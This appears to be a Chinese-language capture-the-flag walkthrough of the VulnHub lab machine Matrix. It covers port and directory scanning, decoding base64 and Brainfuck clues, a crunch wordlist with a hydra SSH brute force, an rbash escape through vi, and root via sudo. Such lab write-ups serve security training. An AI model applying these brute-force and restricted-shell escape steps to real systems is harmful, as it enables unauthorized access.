vulnhub系列：Machine_Matrix

vulnhub系列：Machine_Matrix

靶机下载

一、信息收集

nmap扫描存活，根据mac地址寻找IP

nmap 192.168.23.0/24

nmap扫描端口，开放端口：22、80、31337

nmap 192.168.23.180 -p- -A -sV -Pn

dirb目录扫描，有一个目录assets

dirb http://192.168.23.180/

访问80端口，提示跟随白兔，页面没什么发现

f12查看源码，发现一个图片地址

访问图片，应该是80端口首页提到的白兔

发现图片名字指向了31337端口，访问一下，没什么发现

f12查看源码，发现一串base64加密的字符

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

base64解码，发现是把一串内容写入到了 Cypher.matrix 文件中

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

将 Cypher.matrix 文件下载下来，查看内容

可能是什么加密方式，搜了一下，是 Brainfuck 加密

使用 BerylEnigma 工具进行解密

You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

翻译一下，这里提到能以 guest 用户进行登录 ，密码为 k1ll0rXX ，但是最后两位忘了，所以用XX代替，需要爆破一下

二、getshell

根据密码样式，最后两位大概率 小写字母+数字，使用kali中crunch工具生成字典

crunch 8 8 -t k1ll0r%@ -o 1.txt
#参数
8 8：密码最小长度和最大长度
-t：使用特殊符号
%：0-9数字
@：小写字母
-o：输入到指定文件

使用 hydra 工具进行爆破，得到密码 k1ll0r7n

hydra -l guest -P 1.txt ssh://192.168.23.180

ssh进行连接，连接成功

ssh guest@192.168.23.180
k1ll0r7n

三、提权

查看当前权限，命令被限制，无法使用

sudo -l

很多命令无法使用，执行export，发现是受限制shell：rbash

发现vi命令可以使用，vi绕过rbash

vi
按shift+:
!/bin/bash

发现还是无法执行一些命令，执行以下命令，配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

sudo -l显示为all，sudo su提权，提权成功

sudo su

在 root 下找到 flag 文件